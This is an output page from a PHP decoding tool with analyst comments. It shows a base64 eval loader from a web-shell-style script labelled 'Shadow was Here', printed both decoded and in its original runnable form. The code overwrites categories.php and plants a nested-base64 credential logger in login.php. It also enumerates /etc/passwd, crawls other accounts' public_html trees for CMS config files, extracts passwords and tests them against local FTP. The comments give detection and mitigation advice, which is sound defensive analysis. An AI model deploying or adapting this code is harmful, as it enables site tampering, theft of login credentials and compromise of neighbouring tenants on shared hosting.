PHP Decode
<?php #######Shadow########################### $rhs = "ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0a..
Decoded Output download
# Analyst note: this is the decoded payload of an eval(base64_decode(...)) loader.
# It opens an HTML page with a defacement-style title and then lifts the request time limit
# before touching the filesystem.
echo "<html>";
echo "<title>Shadow was Here</title><body>";
# 0 disables PHP's max execution time for this request, so the scan below can run for as long as it needs.
set_time_limit(0);
# Host fingerprint; $system_uname is not referenced again anywhere in this listing.
$system_uname = php_uname();
$system_pwd = getcwd();
#####################
# Builds an "/admin" path by replacing "/images" in the current working directory. This suggests the
# script was expected to run from a web-writable images directory beside an admin area. That is an
# inference from the path rewrite only, so confirm against the affected host.
# NOTE(review): ereg_replace() was removed in PHP 7.0, so this statement is fatal on PHP 7 and later.
$pwd_admin = ereg_replace('/images','/admin', $system_pwd);
# Tampering stage. It runs only when the derived admin directory exists (chdir succeeds) and is
# writable by the account PHP runs as. Detection: file-integrity monitoring on categories.php and
# login.php in that directory. Mitigation: application code should not be writable by the web server user.
if (chdir($pwd_admin)) {
if (is_writable($pwd_admin)) {
if (is_writable('categories.php')) {
# Removes the original categories.php and re-creates it, intending to replace it with a redirect stub.
# NOTE(review): the status string below is assigned without checking the fopen()/fwrite() results,
# so the "[-] Categories Patched" message is not evidence of what ended up on disk. Inspect the file
# itself (missing, empty or replaced) during response.
unlink('categories.php');
$new_categories = "<?php header(location:'http://www.google.com'); ?>";
$patch_categories = fopen('categories.php','w');
$write_categories = fwrite('categories.php',"$new_categories");
$response_categories= "[-] Categories Patched";
}
else { $response_categories = "[-] Unable to patch Categories"; }
if (is_writable('login.php')) {
# Intended to append a PHP snippet to login.php that eval()s a second, nested base64 string.
# That nested string decodes to code that reads the POSTed 'username' and 'password' fields and hands
# each to a helper that appends them to a file named passwd.txt (one branch names
# /dev/shm/passwd.txt). In other words, it is a credential logger hooked into the login form.
# Indicators to hunt for: eval(base64_decode( text at the end of login.php, and unexpected
# passwd.txt files in the admin directory or under /dev/shm.
$backdoor_login = "<?php eval(base64_decode('aWYgKCRIVFRQX1BPU1RfVkFSU1sndXNlcm5hbWUnXSkgew0KCQ0KCSR3cml0ZSA9ICgkSFRUUF9QT1NUX1ZBUlNbJ3VzZXJuYW1lJ10pOw0KCXBhc3Nfd3JpdGUoJHdyaXRlKTsNCn0NCmlmICgkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ10pIHsNCgkkd3JpdGUgPSAkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ107DQoJcGFzc193cml0ZSgkd3JpdGUpOw0KfQ0KZnVuY3Rpb24gcGFzc193cml0ZSgkd3JpdGUpIHsNCglpZiAoaXNfd3JpdGFibGUoJy90bXAnKSkgew0KCQkkcGFzc19maWxlID0gZm9wZW4oJ3Bhc3N3ZC50eHQnLCJhKyIpOw0KCQkkcGFzc193cml0ZT0gZndyaXRlKCRwYXNzX2ZpbGUsICIkd3JpdGUiKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCcvdmFyL3RtcCcpKSB7DQoJCSRwYXNzX2ZpbGUgPSBmb3BlbigncGFzc3dkLnR4dCcsImErIik7DQoJCSRwYXNzX3dyaXRlPSBmd3JpdGUoJHBhc3NfZmlsZSwgJHdyaXRlKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCdkZXYvc2htJykpIHsNCgkJJHBhc3NfZmlsZSA9IGZvcGVuKCcvZGV2L3NobS9wYXNzd2QudHh0JywiYSsiKTsNCgkJJHBhc3Nfd3JpdGU9IGZ3cml0ZSgnJHBhc3NfZmlsZScsICIkd3JpdGUiKTsNCgl9DQp9'); ?>";
# 'a+' opens login.php for append, so the existing login code is kept and the snippet is meant to follow it.
$add_on_login = fopen('login.php','a+');
$write_login = fwrite('login.php',$backdoor_login);
# As with categories.php, this message is set regardless of whether the write succeeded.
$response_login = "[-] Put backdoor on Login";
}
else { $response_login = "[-] Unable To put backdoor on Login"; }
}
}
#####################################
###Bjork##
# Account enumeration: reads /etc/passwd to build a list of local user names.
# The '@' suppresses the warning if the open fails.
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
echo "[-] Error : Unable to open /etc/passwd";
}
# There is no exit after the error message, so the loop below is reached even when the open failed.
$path_to_public=array();
$users=array();
# $pathtoconf is initialised here but never used in this listing.
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
# Ignores the first 36 lines (indices 0-35), presumably to skip system accounts at the top of the
# file. The threshold is hard-coded, so this is an assumption about the target's layout.
if ($i>35) {
$pos=strpos($str,":");
# The text before the first ':' on a passwd line is the account name.
$username=substr($str,0,$pos);
$dirz="/home/$username/public_html/";
if (($username!="")) {
# Keeps only accounts whose public_html is readable by the user PHP runs as. On shared hosting this is
# the underlying exposure: one tenant's web root being readable from another tenant's PHP process.
# Mitigation: restrictive permissions on /home/*/public_html plus per-account PHP isolation
# (separate users/pools, open_basedir).
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################
#########################
# Report stage: results are printed into a <textarea>. Values are echoed as-is, without HTML escaping.
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "[+] Founded ".sizeof($users)." entries in /etc/passwd
";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
";
echo "[~] Searching for passwords in config.* files...
";
# $response_work_dir and $response_bot are never assigned in this listing. $response_login and
# $response_categories are only set when the admin-directory branch ran. Unset ones print as empty.
echo "$response_work_dir
";
echo "$response_login
";
echo "$response_categories
";
echo "$response_bot
";
# Walks every collected account's web root. The path is rebuilt here rather than taken from $path_to_public.
# Detection: a single PHP request opening many /home/*/public_html trees is unusual for normal site code
# and is visible to file-access auditing.
foreach ($users as $user) {
$path="/home/$user/public_html/";
read_dir($path,$user);
}
echo "
[+] Done
";
/**
 * Recursively walks a directory tree and inspects files whose names match a fixed list of
 * common application configuration file names.
 *
 * For each match, get_pass() is called on the file. A non-empty result is printed together
 * with the file path and then passed to ftp_check() along with the account name.
 *
 * Defender notes: the file-name list in the long condition below (wp-config.php, configuration.php,
 * config.inc.php, ...) is effectively a watchlist of files that hold database credentials.
 * They should not be readable by other accounts, and the secrets in them should not be
 * reused for FTP or system logins.
 *
 * @param string $path     Directory to scan; concatenated directly with entry names, so it must end in '/'.
 * @param string $username Account the directory belongs to; only forwarded to ftp_check().
 */
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath="$path$file";
if (($file!='.') and ($file!='..')) {
# Unreadable entries are skipped silently, so file permissions are what stops this scan.
if (is_readable($fpath)) {
$dr="$fpath/";
if (is_dir($dr)) {
# Descends into subdirectories; no depth limit is applied.
read_dir($dr,$username);
}
else {
# Exact, case-sensitive file-name match against known CMS/framework config names (some are listed twice).
if (($file=='config.php') or ($file=='e107_config.php') or ($file=='header.inc.php') or ($file=='content.inc.php') or ($file=='mainfile.php') or ($file=='utils.inc.php') or ($file=='main.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='e107_config.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='configuration.php') or ($file=='configurations.php') or ($file=='configs.php') or ($file=='config.locale.php') or ($file=='db.inc.php') or ($file=='dbconnect.inc.php') or ($file=='dbconnection.php') or ($file=='var.php') or ($file=='mysql.php') or ($file=='global.inc.php') or ($file=='database.php') or ($file=='dbconnect.php') or ($file=='conf.php') or ($file=='configDB.inc.php') or ($file=='db.php') or ($file=='db_connect.php')) {
$pass=get_pass($fpath);
if ($pass!='') {
# Path and extracted value are written to the page in clear text.
echo "[+] $fpath
$pass
";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
/**
 * Extracts a candidate password string from the first line of a file that contains "pass".
 *
 * The match is a plain substring test, so comments and unrelated identifiers containing "pass"
 * also qualify. The 'password' and 'passwd' tests are redundant because both contain 'pass'.
 * The value is cut from three characters after the first '=' up to the last double quote on the
 * line, or up to the last single quote when no double quote is found past column 0.
 *
 * Defender note: this only works against secrets stored as quoted literals in files the PHP
 * process can read. File permissions and keeping credentials out of the web root are the controls.
 *
 * @param string $link Path of the file to read.
 * @return string|null Extracted substring from the first matching line; nothing is returned
 *                     (null) when no line matches.
 */
function get_pass($link) {
# Open errors are suppressed with '@' and the handle is not checked before use.
@$config=fopen($link,'r');
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
if (strrpos($line,'"'))
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
else
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
# Returns on the first matching line only; later lines are never examined.
return $pass;
}
}
}
/**
 * Tests whether a recovered value is also the account's FTP password on the local host.
 *
 * Connects to the FTP service on 127.0.0.1 and attempts a login with the given account name
 * and value, printing the pair in clear text on success. This is a password-reuse check between
 * application config secrets and the hosting account.
 *
 * Defender notes: look for FTP authentication attempts originating from 127.0.0.1 across many
 * accounts in a short window in the FTP server log. Distinct database and FTP/system passwords
 * make a successful login here impossible.
 *
 * @param string $login Account name to try.
 * @param string $pass  Candidate password taken from a config file.
 */
function ftp_check($login,$pass) {
# Both calls suppress errors with '@'; a failed connect simply skips the check.
@$ftp=ftp_connect('127.0.0.1');
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo '[FTP] '.$login.':'.$pass." Success
";
}
# The connection is closed explicitly only in the failure branch.
else ftp_quit($ftp);
}
}
# Closes the report <textarea> and the HTML page opened at the start of the payload.
echo "</textarea><br>";
echo "</body></html>";
Original Code
<?php
#######Shadow###########################
$rhs = "ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0aXRsZT5TaGFkb3cgd2FzIEhlcmU8L3RpdGxlPjxib2R5PiI7DQpzZXRfdGltZV9saW1pdCgwKTsNCiRzeXN0ZW1fdW5hbWUgPSBwaHBfdW5hbWUoKTsNCiRzeXN0ZW1fcHdkICAgPSBnZXRjd2QoKTsNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KJHB3ZF9hZG1pb
iA9IGVyZWdfcmVwbGFjZSgnL2ltYWdlcycsJy9hZG1pbicsICRzeXN0ZW1fcHdkKTsNCmlmIChjaGRpcigkcHdkX2FkbWluKSkgew0KCWlmIChpc193cml0YWJsZSgkcHdkX2FkbWluKSkgew0KCQlpZiAoaXNfd3JpdGFibGUoJ2NhdGVnb3JpZXMucGhwJykpIHsNCgkJCXVubGluaygnY2F0ZWdvcmllcy5waHAnKT
sNCgkJCSRuZXdfY2F0ZWdvcmllcyAgICAgPSAiPD9waHAgaGVhZGVyKGxvY2F0aW9uOidodHRwOi8vd3d3Lmdvb2dsZS5jb20nKTsgPz4iOw0KCQkJJHBhdGNoX2NhdGVnb3JpZXMgICA9IGZvcGVuKCdjYXRlZ29yaWVzLnBocCcsJ3cnKTsNCgkJCSR3cml0ZV9jYXRlZ29yaWVzICAgPSBmd3JpdGUoJ2NhdGVnb3J
pZXMucGhwJywiJG5ld19jYXRlZ29yaWVzIik7DQoJCQkkcmVzcG9uc2VfY2F0ZWdvcmllcz0gIlstXSBDYXRlZ29yaWVzIFBhdGNoZWQiOw0KCQl9DQoJCWVsc2UgeyAkcmVzcG9uc2VfY2F0ZWdvcmllcyA9ICJbLV0gVW5hYmxlIHRvIHBhdGNoIENhdGVnb3JpZXMiOyB9DQoJCWlmIChpc193cml0YWJsZSgnbG9n
aW4ucGhwJykpIHsNCgkJCSRiYWNrZG9vcl9sb2dpbiA9ICI8P3BocCBldmFsKGJhc2U2NF9kZWNvZGUoJ2FXWWdLQ1JJVkZSUVgxQlBVMVJmVmtGU1Uxc25kWE5sY201aGJXVW5YU2tnZXcwS0NRMEtDU1IzY21sMFpTQTlJQ2drU0ZSVVVGOVFUMU5VWDFaQlVsTmJKM1Z6WlhKdVlXMWxKMTBwT3cwS0NYQmhjM05mZ
DNKcGRHVW9KSGR5YVhSbEtUc05DbjBOQ21sbUlDZ2tTRlJVVUY5UVQxTlVYMVpCVWxOYkozQmhjM04zYjNKa0oxMHBJSHNOQ2dra2QzSnBkR1VnUFNBa1NGUlVVRjlRVDFOVVgxWkJVbE5iSjNCaGMzTjNiM0prSjEwN0RRb0pjR0Z6YzE5M2NtbDBaU2drZDNKcGRHVXBPdzBLZlEwS1puVnVZM1JwYjI0Z2NHRnpjMT
kzY21sMFpTZ2tkM0pwZEdVcElIc05DZ2xwWmlBb2FYTmZkM0pwZEdGaWJHVW9KeTkwYlhBbktTa2dldzBLQ1Fra2NHRnpjMTltYVd4bElEMGdabTl3Wlc0b0ozQmhjM04zWkM1MGVIUW5MQ0poS3lJcE93MEtDUWtrY0dGemMxOTNjbWwwWlQwZ1puZHlhWFJsS0NSd1lYTnpYMlpwYkdVc0lDSWtkM0pwZEdVaUtUc05
DZ2w5RFFvSlpXeHpaV2xtS0dselgzZHlhWFJoWW14bEtDY3ZkbUZ5TDNSdGNDY3BLU0I3RFFvSkNTUndZWE56WDJacGJHVWdQU0JtYjNCbGJpZ25jR0Z6YzNka0xuUjRkQ2NzSW1FcklpazdEUW9KQ1NSd1lYTnpYM2R5YVhSbFBTQm1kM0pwZEdVb0pIQmhjM05mWm1sc1pTd2dKSGR5YVhSbEtUc05DZ2w5RFFvSlpX
eHpaV2xtS0dselgzZHlhWFJoWW14bEtDZGtaWFl2YzJodEp5a3BJSHNOQ2drSkpIQmhjM05mWm1sc1pTQTlJR1p2Y0dWdUtDY3ZaR1YyTDNOb2JTOXdZWE56ZDJRdWRIaDBKeXdpWVNzaUtUc05DZ2tKSkhCaGMzTmZkM0pwZEdVOUlHWjNjbWwwWlNnbkpIQmhjM05mWm1sc1pTY3NJQ0lrZDNKcGRHVWlLVHNOQ2dsO
URRcDknKTsgPz4iOw0KCQkJJGFkZF9vbl9sb2dpbiAgID0gZm9wZW4oJ2xvZ2luLnBocCcsJ2ErJyk7DQoJCQkkd3JpdGVfbG9naW4gICAgPSBmd3JpdGUoJ2xvZ2luLnBocCcsJGJhY2tkb29yX2xvZ2luKTsNCgkJCSRyZXNwb25zZV9sb2dpbiA9ICJbLV0gUHV0IGJhY2tkb29yIG9uIExvZ2luIjsNCgkJCQkJfQ
0KCQllbHNlIHsgJHJlc3BvbnNlX2xvZ2luID0gIlstXSBVbmFibGUgVG8gcHV0IGJhY2tkb29yIG9uIExvZ2luIjsgfQkJCQ0KCX0NCn0NCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KIyMjQmpvcmsjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsNCmlmICghJHB
hc3N3ZCkgew0KICAgZWNobyAiWy1dIEVycm9yIDogVW5hYmxlIHRvIG9wZW4gL2V0Yy9wYXNzd2QiOw0KfQ0KJHBhdGhfdG9fcHVibGljPWFycmF5KCk7DQokdXNlcnM9YXJyYXkoKTsNCiRwYXRodG9jb25mPWFycmF5KCk7DQokaT0wOw0Kd2hpbGUoIWZlb2YoJHBhc3N3ZCkpIHsNCiAgJHN0cj1mZ2V0cygkcGFz
c3dkKTsNCiAgaWYgKCRpPjM1KSB7DQogICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOw0KICAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOw0KICAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsNCiAgICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7DQogICAgICAgIGlmIChpc19yZWFkY
WJsZSgkZGlyeikpIHsNCiAgICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7DQogICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7DQogICAgICAgIH0NCiAgICB9DQogIH0NCiAgJGkrKzsNCn0NCiMjIyMjIyMjIyMjIyMjIyMjIyMNCiMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMNCmVjaG8gIjxicj48YnI+IjsNCmVjaG8gIjx0ZXh0YXJlYSBuYW1lPSdtYWluX3dpbmRvdycgY29scz0xMDAgcm93cz0yMD4iOw0KZWNobyAiWytdIEZvdW5kZWQgIi5zaXplb2YoJHVzZXJzKS4iIGVudHJpZXMgaW4gL2V0Yy9wYXNzd2RcbiI7DQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZig
kcGF0aF90b19wdWJsaWMpLiIgcmVhZGFibGUgcHVibGljX2h0bWwgZGlyZWN0b3JpZXNcbiI7DQplY2hvICJbfl0gU2VhcmNoaW5nIGZvciBwYXNzd29yZHMgaW4gY29uZmlnLiogZmlsZXMuLi5cblxuIjsNCmVjaG8gIiRyZXNwb25zZV93b3JrX2RpclxuIjsNCmVjaG8gIiRyZXNwb25zZV9sb2dpblxuIjsNCmVj
aG8gIiRyZXNwb25zZV9jYXRlZ29yaWVzXG4iOw0KZWNobyAiJHJlc3BvbnNlX2JvdFxuIjsNCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgew0KICAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsNCiAgICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOw0KfQ0KZWNobyAiXG5bK10gRG9uZ
VxuIjsNCmZ1bmN0aW9uIHJlYWRfZGlyKCRwYXRoLCR1c2VybmFtZSkgew0KICAgIGlmICgkaGFuZGxlID0gb3BlbmRpcigkcGF0aCkpIHsNCiAgICAgICAgd2hpbGUgKGZhbHNlICE9PSAoJGZpbGUgPSByZWFkZGlyKCRoYW5kbGUpKSkgew0KICAgICAgICAgICAgICAkZnBhdGg9IiRwYXRoJGZpbGUiOw0KICAgIC
AgICAgICAgICBpZiAoKCRmaWxlIT0nLicpIGFuZCAoJGZpbGUhPScuLicpKSB7DQogICAgICAgICAgICAgICAgIGlmIChpc19yZWFkYWJsZSgkZnBhdGgpKSB7DQogICAgICAgICAgICAgICAgICAgICRkcj0iJGZwYXRoLyI7DQogICAgICAgICAgICAgICAgICAgIGlmIChpc19kaXIoJGRyKSkgew0KICAgICAgICA
gICAgICAgICAgICAgICByZWFkX2RpcigkZHIsJHVzZXJuYW1lKTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBlbHNlIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKCRmaWxlPT0nY29uZmlnLnBocCcpIG9yICgkZmlsZT09J2UxMDdfY29uZmlnLnBocCcpIG9yICgk
ZmlsZT09J2hlYWRlci5pbmMucGhwJykgb3IgKCRmaWxlPT0nY29udGVudC5pbmMucGhwJykgb3IgKCRmaWxlPT0nbWFpbmZpbGUucGhwJykgb3IgKCRmaWxlPT0ndXRpbHMuaW5jLnBocCcpIG9yICgkZmlsZT09J21haW4ucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnLmluYy5waHAnKSBvciAoJGZpbGU9PSdkYi5pb
mMucGhwJykgb3IgKCRmaWxlPT0nY29ubmVjdC5waHAnKSBvciAoJGZpbGU9PSdlMTA3X2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd3cC1jb25maWcucGhwJykgb3IgKCRmaWxlPT0ndmFyLnBocCcpIG9yICgkZmlsZT09J2NvbmZpZ3VyZS5waHAnKSBvciAoJGZpbGU9PSdjb25maWd1cmF0aW9uLnBocCcpIG9yIC
gkZmlsZT09J2NvbmZpZ3VyYXRpb25zLnBocCcpIG9yICgkZmlsZT09J2NvbmZpZ3MucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnLmxvY2FsZS5waHAnKSBvciAoJGZpbGU9PSdkYi5pbmMucGhwJykgb3IgKCRmaWxlPT0nZGJjb25uZWN0LmluYy5waHAnKSBvciAoJGZpbGU9PSdkYmNvbm5lY3Rpb24ucGhwJykgb3I
gKCRmaWxlPT0ndmFyLnBocCcpIG9yICgkZmlsZT09J215c3FsLnBocCcpIG9yICgkZmlsZT09J2dsb2JhbC5pbmMucGhwJykgb3IgKCRmaWxlPT0nZGF0YWJhc2UucGhwJykgb3IgKCRmaWxlPT0nZGJjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J2NvbmYucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnREIuaW5jLnBo
cCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsNCiAgICAgICAgICAgICAgICAgICAgI
CAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgIC
B9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgIH0gDQogICAgICAgIH0NCiAgICB9DQp9DQpmdW5jdGlvbiBnZXRfcGFzcygkbGluaykgew0KICAgIEAkY29uZmlnPWZvcGVuKCRsaW5rLCdyJyk7DQogICAgd2hpbGUoIWZlb2YoJGNvbmZpZykpIHsNCiAgICAgICAgJGxpbmU9ZmdldHMoJGNvbmZpZyk
7DQogICAgICAgIGlmIChzdHJzdHIoJGxpbmUsJ3Bhc3MnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3b3JkJykgb3Igc3Ryc3RyKCRsaW5lLCdwYXNzd2QnKSkgew0KICAgICAgICAgICAgaWYgKHN0cnJwb3MoJGxpbmUsJyInKSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICRwYXNzPXN1YnN0cigkbGluZSwo
c3RycG9zKCRsaW5lLCc9JykrMyksKHN0cnJwb3MoJGxpbmUsJyInKS0oc3RycG9zKCRsaW5lLCc9JykrMykpKTsNCiAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICRwYXNzPXN1YnN0cigkbGluZSwoc3RycG9zKCRsaW5lLCc9JykrMyksKHN0cnJwb3MoJGxpbmUsIiciKS0oc3RycG9zKCRsaW5lLCc9JykrM
ykpKTsNCiAgICAgICAgICAgIHJldHVybiAkcGFzczsNCiAgICAgICAgfQ0KICAgIH0NCn0NCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsNCiAgICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOw0KICAgICBpZiAoJGZ0cCkgew0KICAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG
9naW4sJHBhc3MpOw0KICAgICAgICBpZiAoJHJlcykgew0KICAgICAgICAgIGVjaG8gJ1tGVFBdICcuJGxvZ2luLic6Jy4kcGFzcy4iICBTdWNjZXNzXG4iOw0KICAgICAgICB9DQogICAgICAgIGVsc2UgZnRwX3F1aXQoJGZ0cCk7DQogICAgIH0NCn0NCmVjaG8gIjwvdGV4dGFyZWE+PGJyPiI7DQplY2hvICI8L2J
vZHk+PC9odG1sPiI7";
# Loader: base64-decodes the string held in $rhs and executes the result with eval(). The whole payload
# is hidden in that one string literal, so scanning the file for function names such as fopen or
# ftp_login finds nothing. Static detection should key on eval(base64_decode( applied to a long literal
# and on decoding the literal before inspection.
eval(base64_decode($rhs));
##########was######here#################
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 364c3aacc565b4ace7eddbe33aac9f67 |
Eval Count | 1 |
Decode Time | 92 ms |